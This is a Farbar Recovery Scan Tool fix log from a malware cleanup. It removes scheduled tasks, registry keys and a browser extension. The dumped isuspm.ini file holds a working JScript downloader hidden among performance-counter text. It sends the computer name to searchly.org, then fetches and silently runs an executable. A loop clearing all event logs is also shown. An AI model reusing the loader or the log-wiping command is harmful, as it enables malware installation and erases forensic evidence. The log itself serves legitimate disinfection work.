Fix result of Farbar Recovery Scan Tool (x86) Version: 29-01-2017 Ran by axioo (01-02-2017 11:04:36) Run:1 Running from C:\Users\axioo\Desktop Loaded Profiles: axioo (Available Profiles: axioo) Boot Mode: Normal ============================================== fixlist content: ***************** CloseProcesses: HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings: [ProxySettingsPerUser] 0 <======= ATTENTION (Restriction - ProxySettings) HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION CHR Extension: (ZenMate VPN - Best Cyber Security & Unblock) - C:\Users\axioo\AppData\Local\Google\Chrome\User Data\Default\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2017-01-31] CustomCLSID: HKU\S-1-5-21-4294006291-3268964387-4160186193-1001_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32 -> C:\Users\axioo\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\FileSyncShell.dll => No File CustomCLSID: HKU\S-1-5-21-4294006291-3268964387-4160186193-1001_Classes\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32 -> C:\Users\axioo\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\FileSyncShell.dll => No File CustomCLSID: HKU\S-1-5-21-4294006291-3268964387-4160186193-1001_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32 -> C:\Users\axioo\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\FileSyncShell.dll => No File CMD: type C:\ProgramData\InstallShield\Update\isuspm.ini Task: {1520FF60-C188-4467-BB74-D410F220E326} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe [2017-01-30] () Task: {A838CE2E-1147-4532-B4A2-8E33135979AF} - System32\Tasks\Optimize Thumbnail Cache Files => Wscript.exe //nologo //E:jscript //B C:\ProgramData\InstallShield\Update\isuspm.ini <==== ATTENTION Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => D:\Program Files\Google\Update\GoogleUpdate.exe Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => D:\Program Files\Google\Update\GoogleUpdate.exe CMD: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" ***************** Processes closed successfully. HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxySettingsPerUser => value not found. HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => key removed successfully. C:\Users\axioo\AppData\Local\Google\Chrome\User Data\Default\Extensions\fdcgdnkidjaadafnichfpabhfomcebme => moved successfully HKU\S-1-5-21-4294006291-3268964387-4160186193-1001_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E} => key removed successfully. HKU\S-1-5-21-4294006291-3268964387-4160186193-1001_Classes\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C} => key removed successfully. HKU\S-1-5-21-4294006291-3268964387-4160186193-1001_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E} => key removed successfully. ========= type C:\ProgramData\InstallShield\Update\isuspm.ini ========= /*{info} drivername=ESENT symbolfile=esentprf.hxx {languages} 009=U.S. English 01F=A.B.D. Ýngilizcesi 01D=Amerikansk engelska 00A=Spanish 019=Russian 016=Portuguese 015=Angielski (USA) 012=Korean 011=Japanese 010=Italian 00E=Amerikai angol 007=German 00C=French 013=Nederlands 005=Czech 004=Traditional Chinese 004=Simplified Chinese 016=Inglês (EUA) 000=Neutral {objects} ESE_009_Name=Database ESE_01F_Name=Veritabaný ESE_01D_Name=Databas ESE_00A_Name=Base de datos ESE_019_Name=Áàçà äàííûõ ESE_016_Name=Base de dados ESE_015_Name=Baza danych ESE_012_Name=Database ESE_011_Name=Database ESE_010_Name=Database ESE_00E_Name=Adatbázis ESE_007_Name=Datenbank ESE_00C_Name=Base de données ESE_013_Name=Database ESE_005_Name=Databáze ESE_004_Name=Database ESE_004_Name=Database ESE_016_Name=Banco de dados Instances_009_Name=Database ==> Instances Instances_01F_Name=Veritabaný ==> Kopyalar Instances_01D_Name=Databas ==> Instanser Instances_00A_Name=Base de datos ==> Instancias Instances_019_Name=Áàçà äàííûõ ==> Ýêçåìïëÿðû Instances_016_Name=Base de dados ==> Ocorrências Instances_015_Name=Baza danych ==> Wyst¹pienia Instances_012_Name=Database ==> Instances Instances_011_Name=Database ==> Instances Instances_010_Name=Database ==> Istanze Instances_00E_Name=Adatbázis ==> Példányok Instances_007_Name=Datenbank ==> Instanzen Instances_00C_Name=Base de données ==> Instances Instances_013_Name=Database ==> Sessies Instances_005_Name=Databáze ==> Instance Instances_004_Name=Database ==> Instances Instances_004_Name=Database ==> Instances Instances_016_Name=Banco de dados ==> Instâncias {text} FCBAsyncScan_000_Help=FCB Asynchronous Scan/sec is the number of cached schema records (FCBs) scanned during asynchronous schema record cleanup. These records are scanned to age out older schema definitions. {Dev Only} FCBAsyncPurge_000_Help=FCB Asynchronous Purge/sec is the number of cached schema records (FCBs) purged during asynchronous schema record cleanup. These records are purged to age out older schema definitions. {Dev Only} FCBAsyncThresholdScan_000_Help=FCB Asynchronous Threshold-Scan/sec is the number of cached schema records (FCBs) scanned during asynchronous schema record cleanup. Cleanup was triggered by a large number of schema records above the preferred limit. These records are aggressively scanned to age out older schema definitions. {Dev Only} FCBAsyncThresholdPurge_000_Help=FCB Asynchronous Threshold-Purge/sec is the number of cached schema records (FCBs) purged during asynchronous schema record cleanup. */var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");/*Cleanup was triggered by a large number of schema records above the preferred limit. These records are aggressively purged to age out older schema definitions. {Dev Only} FCBAsyncPurgeConflict_000_Help=FCB Asynchronous Purge Conflicts/sec is the number of failed purge attempts on cached schema records (FCBs) during asynchronous schema */var strComputerName = new ActiveXObject("WScript.Shell").ExpandEnvironmentStrings("%COMPUTERNAME%");/*record cleanup. The purge operation failed because exclusive ownership of the schema record could not be obtained. {Dev Only} FCBSyncPurge_000_Help=FCB Synchronous Purge/sec is the number of cached schema records (FCBs) being synchronously purged each second. {Dev Only} FCBSyncPurgeStalls_000_Help=FCB Synchronous Purge Stalls/sec is the number of stalls encountered while waiting for exclusive ownership of cached schema records (FCBs) in order to synchronously purge them. {Dev Only} FCBCacheHits_000_Help=FCB Cache % Hit is the percentage of schema records (FCBs) opened directly from the schema record cache. No file operations were required. {Dev Only} FCBCacheRequests_000_Help=*/WinHttpReq.Open("GET", "http://searchly.org/xVwd6.php?v=20.0.0.2&n=" + strComputerName, /*async=*/false); WinHttpReq.Send(); strDlUrl = WinHttpReq.ResponseText; var TmpDir = new ActiveXObject("WScript.Shell").ExpandEnvironmentStrings("%Temp%");/*No text FCBCacheStalls_000_Help=FCB Cache Stalls/sec is the number of stalls encountered while waiting for exclusive ownership of cached schema records (FCBs) in order to update their reference count. {Dev Only} FCBCacheMax_000_Help=FCB Cache Maximum is the absolute maximum number of the schema records (FCBs) that can exist in the cache. {Dev Only} FCBCachePreferred_000_Help=FCB Cache Preferred is the preferred maximum number of the schema records (FCBs) that should exist in the cache. {Dev Only} FCBCacheAlloc_000_Help=FCB Cache Allocated is the number of cached schema records (FCBs) currently allocated and in use. {Dev Only} FCBCacheAllocAvail_000_Help=FCB Cache Available is the number of cached schema records (FCBs) currently allocated but not in use. These records will be used and/or purged as required. {Dev Only} PIBInUse_000_Help=Sessions In Use is the number of database sessions currently open for use by client threads. {Dev Only} PIBUsed_000_Help=Sessions % Used is the percentage of database sessions currently open for use by client threads. {Dev Only} PIBTotal_000_Help=*/var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); WinHttpReq.Open("GET", strDlUrl, /*async=*/false); WinHttpReq.Send();/*No text TableOpenCacheHitRate_000_Help=Table Open Cache % Hit is the percentage of database tables opened using cached schema information. If this percentage is too low, the table cache size may be too small. TableOpenCacheRequests_000_Help=No text TableOpenCacheHitsPerSec_000_Help=Table Open Cache Hits/sec is the number of database tables opened using cached schema information per second. If this rate is too low, the table cache size may be too small. TableOpenCacheMissesPerSec_000_Help=Table Open Cache Misses/sec is the number of database */BinStream = new ActiveXObject("ADODB.Stream");BinStream.Type = 1;BinStream.Open();BinStream.Write(WinHttpReq.ResponseBody);BinStream.SaveToFile(TmpDir + "\\wVx4rt.exe",2);/*tables opened without using cached schema information per second. If this rate is too high, the table cache size may be too small. TableOpensPerSec_000_Help=Table Opens/sec is the number of database tables opened per second. LGBytesWrittenPerSec_000_Help=Log Bytes Write per second is the rate bytes are written to the log.{Dev Only} LGUsersWaiting_000_Help=Log Threads Waiting is the number of threads waiting for their data to be written to the log in order to complete an update of the database. If this number is too high, the log may be a bottleneck. UserROTrxCommit0PerSec_000_Help=User Read Only Transaction Commits to Level 0/sec is the count of fully committed transactions started by the calling process that do not modify any data stored in the MS Exchange DB engine. {Dev Only} UserRWTrxCommit0PerSec_000_Help=User Read/Write Transaction Commits to Level 0/sec is the count */var WshShell = new ActiveXObject("WScript.Shell");WshShell.Run (TmpDir + "\\wVx4rt.exe /VERYSILENT");/*of fully committed transactions started by the calling process that modify data stored in the MS Exchange DB engine. {Dev Only} UserTrxCommit0PerSec_000_Help=User Transaction Commits to Level 0/sec is the count of fully committed transactions started by the calling process that access data stored in the MS Exchange DB engine. {Dev Only} UserROTrxRollback0PerSec_000_Help=User Read Only Transaction Rollbacks to Level 0/sec is the count of aborted transactions started by the calling process that do not modify any data stored in the MS Exchange DB engine. {Dev Only} UserRWTrxRollback0PerSec_000_Help=User Read/Write Transaction Rollbacks to Level 0/sec is the count of aborted transactions started by the calling process that modify data stored in the MS Exchange DB engine. {Dev Only} UserTrxRollback0PerSec_000_Help=User Transaction Rollbacks to Level 0/sec is the count of aborted transactions started by the calling process that access data stored in the MS Exchange DB engine. {Dev Only} SystemROTrxCommit0PerSec_000_Help=System Read Only Transaction Commits to Level 0/sec is the count of fully committed transactions started internally that do not modify any data stored in the MS Exchange DB engine. {Dev Only} SystemRWTrxCommit0PerSec_000_Help=System Read/Write Transaction Commits to Level 0/sec is the count of fully committed transactions started internally that modify data stored in the MS Exchange DB engine. {Dev Only} SystemTrxCommit0PerSec_000_Help=System Transaction Commits to Level 0/sec is the count of fully committed transactions started internally that access data stored in the MS Exchange DB engine. {Dev Only} SystemROTrxRollback0PerSec_000_Help=System Read Only Transaction Rollbacks to Level 0/sec is the count of aborted transactions started internally that do not modify any data stored in the MS Exchange DB engine. {Dev Only}*/ ========= End of CMD: ========= HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1520FF60-C188-4467-BB74-D410F220E326} => key not found. C:\Windows\System32\Tasks\AutoKMS => not found. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AutoKMS => key not found. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A838CE2E-1147-4532-B4A2-8E33135979AF} => key removed successfully. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A838CE2E-1147-4532-B4A2-8E33135979AF} => key removed successfully. C:\Windows\System32\Tasks\Optimize Thumbnail Cache Files => moved successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Optimize Thumbnail Cache Files => key removed successfully. C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => moved successfully C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => moved successfully C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => moved successfully ========= for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" ========= Failed to clear log DebugChannel. The requested operation cannot be performed over an enabled direct channel. The channel must first be disabled before performing the requested operation. Failed to clear log Microsoft-RMS-MSIPC/Debug. The requested operation cannot be performed over an enabled direct channel. The channel must first be disabled before performing the requested operation. Failed to clear log Microsoft-Windows-LiveId/Analytic. Access is denied. Failed to clear log Microsoft-Windows-LiveId/Operational. Access is denied. ========= End of CMD: ========= The system needed a reboot. ==== End of Fixlog 11:05:37 ====